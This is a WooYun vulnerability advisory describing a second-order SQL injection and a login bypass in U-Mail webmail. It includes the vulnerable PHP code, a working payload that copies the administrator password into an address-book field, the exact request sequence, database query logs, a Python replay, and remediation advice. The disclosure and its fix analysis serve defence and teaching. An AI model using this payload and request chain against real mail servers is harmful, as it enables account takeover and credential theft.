
Vulnerability Summary

Defect ID: wooyun-2015-093488

Title: U-Mail mail system second-order SQL injection #2 (no login required; administrator passwords can be harvested in bulk)

Vendor: U-Mail

Author: Ano_Tom

Submitted: 2015-01-23 11:06

Fix deadline: 2015-04-23 11:08

Published: 2015-04-23 11:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center)

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-01-23: Details sent to the vendor, awaiting vendor handling
2015-01-28: Vendor confirmed; details visible to the vendor only
2015-01-31: Details opened to third-party security partners
2015-03-24: Details opened to core white hats and domain experts
2015-04-03: Details opened to regular white hats
2015-04-13: Details opened to trainee white hats
2015-04-23: Details disclosed to the public

Brief description:

Disclaimer: I'm not deliberately farming vulnerabilities; I just do some analysis every day after playing LOL and submit each one as I find it. Sorry about that. I play a pretty mean Twisted Fate, by the way. :)

Detailed description:

The vulnerable file is /fast/oab/module/operates.php. The root cause is identical to the previous second-order injection report; this time it is a different file, and no login is required.

if ( ACTION == "save-to-pab" )
{
    include_once( LIB_PATH."PAB.php" );
    $PAB = PAB::getinstance( );
    $maillist_id = trim( $_GET['maillist'] );
    if ( $maillist_id )
    {
        ......
    }
    else
    {
        $user_ids = trim( $_GET['userlist'] );
        if ( !$user_ids )
        {
            dump_msg( "param_error", "参数错误!" );
        }
        $where = "t1.UserID IN (".$user_ids.")";  // the first-order injection reported previously
        $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );  // reads the user records back from the database
        $user_all = $arr_tmp['data'];
        if ( !$user_all )
        {
            dump_json( array( "status" => TRUE, "message" => "" ) );
        }
        foreach ( $user_all as $user )
        {
            $qq = $msn = "";
            if ( strpos( $user['qqmsn'], "@" ) )
            {
                $msn = $user['qqmsn'];
            }
            else
            {
                $qq = $user['qqmsn'];
            }
            // add_contact() only runs when no contact with this address exists yet
            if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )
            {
                $data = array(
                    "user_id" => $user_id,
                    "fullname" => $user['FullName'],  // value read from the database, not escaped again
                    "pref_email" => $user['email'],
                    "pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
                    "birthday" => $user['birthday'],
                    "im_qq" => $qq,
                    "im_msn" => $msn,
                    "updated" => date( "Y-m-d H:i:s" )
                );
                $res = $PAB->add_contact( $data, 0 );  // the unescaped data is concatenated straight into the INSERT
                if ( !$res )
                {
                    dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
                }
            }
        }
    }
    dump_json( array( "status" => TRUE, "message" => "" ) );
}


Next we look for user-controlled input that reaches those columns. The code in /fast/option/module/o_userinfo.php is:

if ( !defined( "PRELOAD_OK" ) )
{
    exit( "error" );
}
$user_id = get_session( "user_id" );
$domain_id = get_session( "domain_id" );
if ( ACTION == "userinfo" )
{
    $url = "/webmail/fast/option/index.php?module=view&action=userinfo";
    $where = "UserID='".$user_id."'";
    $data = array(
        "fullname" => gss( $_POST['fullname'] )  // display name; gss() escapes it, but only for this UPDATE
    );
    $result = $Mailbox->update_mailbox( $data, $where, 0 );  // stores the name in userlist
    if ( !$result )
    {
        redirect( $url, "修改姓名时出现错误,修改失败!" );
    }
    $data = array(
        "sex" => gss( $_POST['gender'] ),
        "birthday" => gss( $_POST['bd_year'] )."-".gss( $_POST['bd_month'] )."-".gss( $_POST['bd_day'] ),
        "mobil" => gss( $_POST['mobile'] ),
        "teleextension" => gss( $_POST['tel'] ),
        "qqmsn" => gss( $_POST['im'] )
    );
    $result = $Mailbox->update_info( $data, $where, 0 );  // step one: the profile update that plants the payload
    $msg = $result ? "" : "修改用户信息时出现错误,修改失败!";
    redirect( $url );
}


Why no login is needed is covered in the earlier report: the login in the fast/ directory only checks that the username exists, treats any existing username as a successful login, and from then on every sensitive function is reachable. Since the system account exists by default, it can be used. The exploitation steps are as follows.
POST the following data to http://mail.fuck.com/webmail/fast/index.php?module=operate&action=login: [email protected]&link=? This yields an authenticated session, as shown:

[Figure a.png]


Then invoke the change-display-name function: POST to
http://mail.fuck.com/webmail/fast/option/index.php?module=operate&action=userinfo the data fullname=',`homepage`=(SELECT password from userlist where userid=2)# as shown:

[Figure b.png]


Then perform the following operation:

[Figure c.png]


150123 10:12:23	 2720 Connect	umail@localhost on 
2720 Query SET NAMES 'UTF8'
2720 Init DB umail
2720 Query UPDATE userlist SET `fullname`='\',`homepage`=(SELECT password from userlist where userid=2)#' WHERE UserID='2'
2720 Query UPDATE mailuserinfo SET `sex`='',`birthday`='--',`mobil`='',`teleextension`='',`qqmsn`='' WHERE UserID='2'
2720 Quit


The save-to-pab (update) step produces the following queries:

150123 10:15:48	 2723 Connect	umail@localhost on 
2723 Query SET NAMES 'UTF8'
2723 Init DB umail
2723 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (2)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2723 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (2)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2723 Quit
150123 10:15:50 2678 Query SELECT DomainName from domains
2678 Query SELECT UserID, Mailbox, FullName, MailDir, Password, AutoDecode, IsForwarding, AllowAccess, AllowChangeViaEmail, KeepForwardedMail, HideFromEveryone, EncryptMail, ApplyQuotas, EnableMultiPop, CanModifyGAB, CalendarOnly, MaxMessageCount, MaxDiskSpace, UserList.DomainID, Domains.DomainName, Domains.DomainID FROM UserList, Domains WHERE UserList.DomainID=Domains.DomainID AND FullName = 'mdaemon server' AND DomainName = 'fuck.com'
2678 Query SELECT DomainName from domains
2678 Query SELECT * FROM Domains


No INSERT was executed. The log shows why: getMailboxInfo() filters on t1.UserID>2, so the system account (UserID 2) is never returned and the foreach never reaches add_contact(); in addition, the insert is guarded by if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) ), so it only runs when no contact with that address exists yet. The injection is therefore carried out from an ordinary user account instead, which is enough to read the system administrator's password. Step 1: obtain a session:

[Figure d.png]


Step 2: change the user's profile. POST to
http://mail.fuck.com/webmail/fast/option/index.php?module=operate&action=userinfo the data fullname=',`homepage`=(SELECT password from userlist where userid=2)#

[Figure e.png]


Step 3: look up the user's UserID:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test0008

[Figure f.png]


Step 4: trigger the save-to-pab operation: http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=10

[Figure g.png]


Step 5: the row has been inserted, but the contact's details (including the homepage field) are not displayed anywhere in the UI. After some searching, the address-book export function turns out to return them, so request
http://mail.fuck.com/webmail/fast/pab/index.php?module=operate&action=contact-export; the result is shown below:

[Figure h.png]


This yields the administrator's password, which means control of the entire system. The full SQL trace of the chain is:

150123 10:28:14	 2744 Connect	umail@localhost on 
2744 Query SET NAMES 'UTF8'
2744 Init DB umail
2744 Query UPDATE userlist SET `fullname`='\',`homepage`=(SELECT password from userlist where userid=2)#' WHERE UserID='10'
2744 Query UPDATE mailuserinfo SET `sex`='',`birthday`='--',`mobil`='',`teleextension`='',`qqmsn`='' WHERE UserID='10'
2744 Quit


150123 10:29:50	 2747 Connect	umail@localhost on 
2747 Query SET NAMES 'UTF8'
2747 Init DB umail
2747 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (10)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2747 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (10)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2747 Query SELECT contact_id FROM pab_contact WHERE user_id='10' AND pref_email='[email protected]' LIMIT 1
2747 Query INSERT INTO pab_contact SET `user_id`='10',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='[email protected]',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-01-23 10:29:50'
2747 Quit
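The whole chain above, replayed as an added example (not U-Mail's code) in Python against an in-memory SQLite database so it runs offline. It assumes a reduced schema with only the columns the report's queries touch, made-up passwords and addresses, a gss() stand-in that doubles quotes (SQLite) where U-Mail backslash-escapes (MySQL), and a payload rewritten for an INSERT ... VALUES template with SQLite's `--` comment in place of the report's INSERT ... SET and `#`. It shows the first UPDATE storing the payload inertly, the second INSERT executing it so the admin password lands in the exported homepage field, and the same second step with bound parameters, which is what remediation item 1 amounts to.

```python
import sqlite3

# Constructed sample data mirroring the report: UserID 2 is the "system" admin
# account, UserID 10 is the ordinary account that carries the payload.
# All passwords and addresses below are made up.
ADMIN_PASSWORD = "AdminSecret!"

# The report's payload targets MySQL's INSERT ... SET syntax and "#".
# This script's second-step INSERT uses INSERT ... VALUES (...) on SQLite, so the
# payload is adapted: close the fullname string, supply a subquery for the
# homepage column, close the VALUES list and comment out the remainder.
PAYLOAD = "', (SELECT Password FROM userlist WHERE UserID=2), 'x')-- "


def setup_db():
    """In-memory stand-in for the userlist and pab_contact tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE userlist (
            UserID INTEGER PRIMARY KEY, Mailbox TEXT, FullName TEXT, Password TEXT);
        CREATE TABLE pab_contact (
            contact_id INTEGER PRIMARY KEY AUTOINCREMENT, user_id INTEGER,
            fullname TEXT, homepage TEXT, pref_email TEXT);
    """)
    conn.execute("INSERT INTO userlist VALUES (2, 'system', 'system', ?)", (ADMIN_PASSWORD,))
    conn.execute("INSERT INTO userlist VALUES (10, 'test0008', 'Test User', 'testpw')")
    return conn


def gss(value):
    """Stand-in for U-Mail's gss(): escapes the quote so the UPDATE itself is safe.
    U-Mail backslash-escapes for MySQL; SQLite escapes by doubling the quote."""
    return value.replace("'", "''")


def update_fullname(conn, user_id, fullname):
    """Step 1 (o_userinfo.php action=userinfo): the name is escaped on the way in,
    so this UPDATE is not injectable and the raw payload lands in userlist.FullName."""
    conn.execute("UPDATE userlist SET FullName='%s' WHERE UserID=%d" % (gss(fullname), user_id))


def contact_exists(conn, user_id, email):
    """Mirrors the getContactByMail() guard: add_contact() runs only for a new address."""
    row = conn.execute(
        "SELECT contact_id FROM pab_contact WHERE user_id=? AND pref_email=? LIMIT 1",
        (user_id, email)).fetchone()
    return row is not None


def _load_user(conn, user_id):
    """Reads the stored name back, as getMailboxInfo() does."""
    fullname, mailbox = conn.execute(
        "SELECT FullName, Mailbox FROM userlist WHERE UserID=?", (user_id,)).fetchone()
    return fullname, mailbox + "@example.com"


def save_to_pab_vulnerable(conn, user_id):
    """Step 4 (operates.php action=save-to-pab): the stored name is concatenated into
    the INSERT unescaped, as add_contact() did, so the payload executes and the admin
    password is copied into pab_contact.homepage."""
    fullname, email = _load_user(conn, user_id)
    if contact_exists(conn, user_id, email):
        return
    conn.execute("INSERT INTO pab_contact (user_id, fullname, homepage, pref_email) "
                 "VALUES (%d, '%s', '', '%s')" % (user_id, fullname, email))


def save_to_pab_fixed(conn, user_id):
    """Same logic with bound parameters (remediation item 1): values read from the
    database are treated as data again, whatever they contain."""
    fullname, email = _load_user(conn, user_id)
    if contact_exists(conn, user_id, email):
        return
    conn.execute("INSERT INTO pab_contact (user_id, fullname, homepage, pref_email) "
                 "VALUES (?, ?, '', ?)", (user_id, fullname, email))


def export_contacts(conn, user_id):
    """Step 5 (pab action=contact-export): the one place the result is readable."""
    return conn.execute(
        "SELECT fullname, homepage FROM pab_contact WHERE user_id=?", (user_id,)).fetchall()


def run(save_to_pab):
    """Plays the whole chain for UserID 10 and returns what the export shows."""
    conn = setup_db()
    update_fullname(conn, 10, PAYLOAD)
    save_to_pab(conn, 10)
    return export_contacts(conn, 10)


if __name__ == "__main__":
    print("vulnerable:", run(save_to_pab_vulnerable))  # homepage holds the admin password
    print("fixed:     ", run(save_to_pab_fixed))       # payload stored inertly as the name
```

The point the example makes concrete is that escaping is a property of one query, not of the data: gss() protects the UPDATE, and the very same stored string becomes live SQL the moment another code path concatenates it. Binding parameters in the second query (or escaping again there) is what breaks the chain; scrubbing input harder at step 1 would not.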

Proof of vulnerability:

As above.

Remediation:

1. Data read back out of the database must be escaped (or bound as a parameter) again before it is written back in; escaping on input only protects the first query.
2. Several modules under the fast/ directory have authentication defects. That directory could simply be removed, since the client/ directory already provides all of the same functionality.

Copyright notice: when reposting, please credit the source: Ano_Tom@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-01-28 09:31

Vendor reply:

CNVD has confirmed the described issue and has notified the software vendor through its established handling channels.

Latest status:

None yet